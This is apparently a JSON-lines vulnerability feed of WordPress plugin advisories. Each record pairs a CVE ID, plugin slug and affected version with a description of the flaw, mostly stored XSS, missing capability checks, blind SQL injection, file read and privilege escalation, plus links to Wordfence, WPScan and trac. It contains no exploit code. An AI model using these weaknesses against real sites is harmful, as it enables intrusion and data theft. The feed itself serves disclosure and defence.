{"CVE_ID":"CVE-2024-1370","slug":"maintenance-page","versionImpact":"1.0.8","description":"The Maintenance Page plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the subscribe_download function hooked via AJAX action in all versions up to, and including, 1.0.8. This makes it possible for authenticated attackers, with subscriber access or higher, to download a csv containing subscriber emails.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1fce54b1-e1e6-4742-9eb3-bbfb613ccd70?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1fce54b1-e1e6-4742-9eb3-bbfb613ccd70?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037664%40maintenance-page%2Ftrunk&old=1218033%40maintenance-page%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037664%40maintenance-page%2Ftrunk&old=1218033%40maintenance-page%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3074","slug":"fd-elementor-imagebox","versionImpact":"1.2.8","description":"The Elementor ImageBox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the image box widget in all versions up to, and including, 1.2.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e24c8f4-32c9-4c21-88d9-588913cbb474?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e24c8f4-32c9-4c21-88d9-588913cbb474?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fd-elementor-imagebox\\\/trunk\\\/elements\\\/fd-adv-imagebox.php#L534\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fd-elementor-imagebox\\\/trunk\\\/elements\\\/fd-adv-imagebox.php#L534\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4458","slug":"themesflat-addons-for-elementor","versionImpact":"2.1.1","description":"The Themesflat Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in several widgets via URL parameters in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0ff03ab-eeb9-4445-92c8-326783d4b10e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0ff03ab-eeb9-4445-92c8-326783d4b10e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/themesflat-addons-for-elementor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/themesflat-addons-for-elementor\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9272","slug":"r-animated-icon","versionImpact":"1.0","description":"The R Animated Icon Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56fd8166-da22-4a0b-a23f-41817acba6df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56fd8166-da22-4a0b-a23f-41817acba6df?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/r-animated-icon\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/r-animated-icon\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9674","slug":"debrandify","versionImpact":"1.1.2","description":"The Debrandify \u00b7 Remove or Replace WordPress Branding plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2110d13-d6d3-43f8-b1bf-8958d4f39ef5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2110d13-d6d3-43f8-b1bf-8958d4f39ef5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/debrandify\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/debrandify\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170586\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170586\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11034","slug":"get-a-quote-button-for-woocommerce","versionImpact":"1.4","description":"The Request a Quote for WooCommerce and Elementor \u2013 Get a Quote Button \u2013 Product Enquiry Form Popup \u2013 Product Quotation plugin for WordPress is vulnerable to arbitrary shortcode execution via the fire_contact_form AJAX action in all versions up to, and including, 1.4. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/get-a-quote-button-for-woocommerce\\\/tags\\\/1.3.9\\\/includes\\\/class-ajax.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/get-a-quote-button-for-woocommerce\\\/tags\\\/1.3.9\\\/includes\\\/class-ajax.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3195227\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3195227\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/get-a-quote-button-for-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/get-a-quote-button-for-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ccd3504-5663-48cd-90bc-502c2ce232f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ccd3504-5663-48cd-90bc-502c2ce232f7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12822","slug":"userpro-mediamanager","versionImpact":"3.11.0","description":"The Media Manager for UserPro plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the add_capto_img() function in all versions up to, and including, 3.11.0. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/media-manager-for-userpro\\\/8664618\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/media-manager-for-userpro\\\/8664618\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a57b2afa-b943-419f-9819-d7b6835c4d10?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a57b2afa-b943-419f-9819-d7b6835c4d10?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-46262","slug":"mad-mimi","versionImpact":"1.5.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Zack Katz Mad Mimi for WordPress allows Stored XSS. This issue affects Mad Mimi for WordPress: from n\/a through 1.5.1.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/mad-mimi\\\/vulnerability\\\/wordpress-mad-mimi-for-wordpress-plugin-1-5-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/mad-mimi\\\/vulnerability\\\/wordpress-mad-mimi-for-wordpress-plugin-1-5-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6378","slug":"responsive-food-and-drink-menu","versionImpact":"2.3","description":"The Responsive Food and Drink Menu plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's display_pdf_menus shortcode in all versions up to, and including, 2.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/responsive-food-and-drink-menu\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/responsive-food-and-drink-menu\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/342ccae4-2e77-4a4f-963f-689b882eb7f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/342ccae4-2e77-4a4f-963f-689b882eb7f0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0370","slug":"wpb-advanced-faq","versionImpact":"1.0.6","description":"The WPB Advanced FAQ WordPress plugin through 1.0.6 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4f5597f9-ab27-42d2-847c-14455b7d0849\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4f5597f9-ab27-42d2-847c-14455b7d0849\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2085","slug":"essential-blocks","versionImpact":"4.0.6","description":"The Essential Blocks plugin for WordPress is vulnerable to unauthorized use of functionality due to a missing capability check on the templates function in versions up to, and including, 4.0.6. This makes it possible for subscriber-level attackers to obtain plugin template information. While a nonce check is present, it is only executed when a nonce is provided. Not providing a nonce results in the nonce verification to be skipped. There is no capability check.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad2c1ab6-5c78-4317-b5e7-c86e2eebeb4f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad2c1ab6-5c78-4317-b5e7-c86e2eebeb4f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/4.0.6\\\/includes\\\/Admin\\\/Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/4.0.6\\\/includes\\\/Admin\\\/Admin.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2900595%40essential-blocks%2Ftrunk&old=2900029%40essential-blocks%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2900595%40essential-blocks%2Ftrunk&old=2900029%40essential-blocks%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3166","slug":"lana-email-logger","description":"The Lana Email Logger plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an email subject in versions up to, and including, Lana Email Logger due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2923581\\\/lana-email-logger#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2923581\\\/lana-email-logger#file1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5f372bf-6b13-4ba7-8b8b-9d3b500e4420?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5f372bf-6b13-4ba7-8b8b-9d3b500e4420?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1514","slug":"wp-e-commerce","versionImpact":"3.15.1","description":"The WP eCommerce plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'cart_contents' parameter in all versions up to, and including, 3.15.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ba5da2b-6944-4243-a4f2-0f887abf7a66?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ba5da2b-6944-4243-a4f2-0f887abf7a66?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-e-commerce\\\/trunk\\\/wpsc-components\\\/marketplace-core-v1\\\/library\\\/Sputnik.php#L334\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-e-commerce\\\/trunk\\\/wpsc-components\\\/marketplace-core-v1\\\/library\\\/Sputnik.php#L334\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1365","slug":"yml-for-yandex-market","versionImpact":"4.2.3","description":"The YML for Yandex Market plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the feed_id  parameter in all versions up to, and including, 4.2.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c343cee6-909d-4c1a-a6e4-f916a2ae223e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c343cee6-909d-4c1a-a6e4-f916a2ae223e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3039876%40yml-for-yandex-market%2Ftrunk&old=3036732%40yml-for-yandex-market%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3039876%40yml-for-yandex-market%2Ftrunk&old=3036732%40yml-for-yandex-market%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3071","slug":"acf-on-the-go","versionImpact":"1.0.1","description":"The ACF On-The-Go plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the acfg_update_fields() function in all versions up to, and including, 1.0.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to update arbitrary post titles, descriptions, and ACF values.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46df438c-abff-4cf3-a732-02e0b3196bac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46df438c-abff-4cf3-a732-02e0b3196bac?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acf-on-the-go\\\/trunk\\\/includes\\\/acfg-front-loader.php#L139\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acf-on-the-go\\\/trunk\\\/includes\\\/acfg-front-loader.php#L139\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8317","slug":"wpadcenter","versionImpact":"2.5.6","description":"The WP AdCenter \u2013 Ad Manager & Adsense Ads plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018ad_alignment\u2019 attribute in all versions up to, and including, 2.5.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac7f95c7-2159-4327-ba09-da7721f1312e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac7f95c7-2159-4327-ba09-da7721f1312e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpadcenter\\\/trunk\\\/admin\\\/class-wpadcenter-admin.php#L2922\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpadcenter\\\/trunk\\\/admin\\\/class-wpadcenter-admin.php#L2922\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpadcenter\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpadcenter\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpadcenter\\\/trunk\\\/admin\\\/class-wpadcenter-admin.php#L3020\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpadcenter\\\/trunk\\\/admin\\\/class-wpadcenter-admin.php#L3020\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpadcenter\\\/trunk\\\/admin\\\/class-wpadcenter-admin.php#L3127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpadcenter\\\/trunk\\\/admin\\\/class-wpadcenter-admin.php#L3127\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3146736\\\/#file6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3146736\\\/#file6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3146736\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3146736\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9269","slug":"relogo","versionImpact":"0.4.2","description":"The Relogo plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 0.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12515236-753e-49e8-b8c8-b0c8831c6005?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12515236-753e-49e8-b8c8-b0c8831c6005?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/relogo\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/relogo\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9425","slug":"advanced-category-and-custom-taxonomy-image","versionImpact":"1.0.9","description":"The Advanced Category and Custom Taxonomy Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ad_tax_image shortcode in all versions up to, and including, 1.0.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f37fb598-72a2-48d3-b2e6-63d6654b1474?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f37fb598-72a2-48d3-b2e6-63d6654b1474?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-category-and-custom-taxonomy-image\\\/trunk\\\/wp-advanced-taxonomy-image.php#L495\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-category-and-custom-taxonomy-image\\\/trunk\\\/wp-advanced-taxonomy-image.php#L495\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-category-and-custom-taxonomy-image\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-category-and-custom-taxonomy-image\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170877\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170877\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12821","slug":"userpro-mediamanager","versionImpact":"3.12.0","description":"The Media Manager for UserPro plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the upm_upload_media() function in all versions up to, and including, 3.12.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/media-manager-for-userpro\\\/8664618\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/media-manager-for-userpro\\\/8664618\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89afc78b-efd5-445e-884f-2345e08df705?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89afc78b-efd5-445e-884f-2345e08df705?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13582","slug":"simple-pricing-tables-vc-extension","versionImpact":"1.0","description":"The Simple Pricing Tables For WPBakery Page Builder(Formerly Visual Composer) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wdo_simple_pricing_table_free' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-pricing-tables-vc-extension\\\/tags\\\/1.0\\\/plugin.class.php#L403\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-pricing-tables-vc-extension\\\/tags\\\/1.0\\\/plugin.class.php#L403\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d94cd171-c2a4-4ef0-bc9a-5fdd2b704b5b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d94cd171-c2a4-4ef0-bc9a-5fdd2b704b5b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1491","slug":"wp-posts-carousel","versionImpact":"1.3.7","description":"The WP Posts Carousel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018auto_play_timeout\u2019 parameter in all versions up to, and including, 1.3.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3248502\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3248502\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-posts-carousel\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-posts-carousel\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f708c72-7ce2-4eb0-869b-cec4613f6f3f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f708c72-7ce2-4eb0-869b-cec4613f6f3f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2539","slug":"file-away","versionImpact":"3.9.9.0.1","description":"The File Away plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ajax() function in all versions up to, and including, 3.9.9.0.1. This makes it possible for unauthenticated attackers, leveraging the use of a reversible weak algorithm,  to read the contents of arbitrary files on the server, which can contain sensitive information.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-away\\\/trunk\\\/lib\\\/cls\\\/class.fileaway_encrypted.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-away\\\/trunk\\\/lib\\\/cls\\\/class.fileaway_encrypted.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-away\\\/trunk\\\/lib\\\/cls\\\/class.fileaway_stats.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-away\\\/trunk\\\/lib\\\/cls\\\/class.fileaway_stats.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/file-away\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/file-away\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b23bd5c-db27-4d63-8461-1f36958a2ff6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b23bd5c-db27-4d63-8461-1f36958a2ff6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
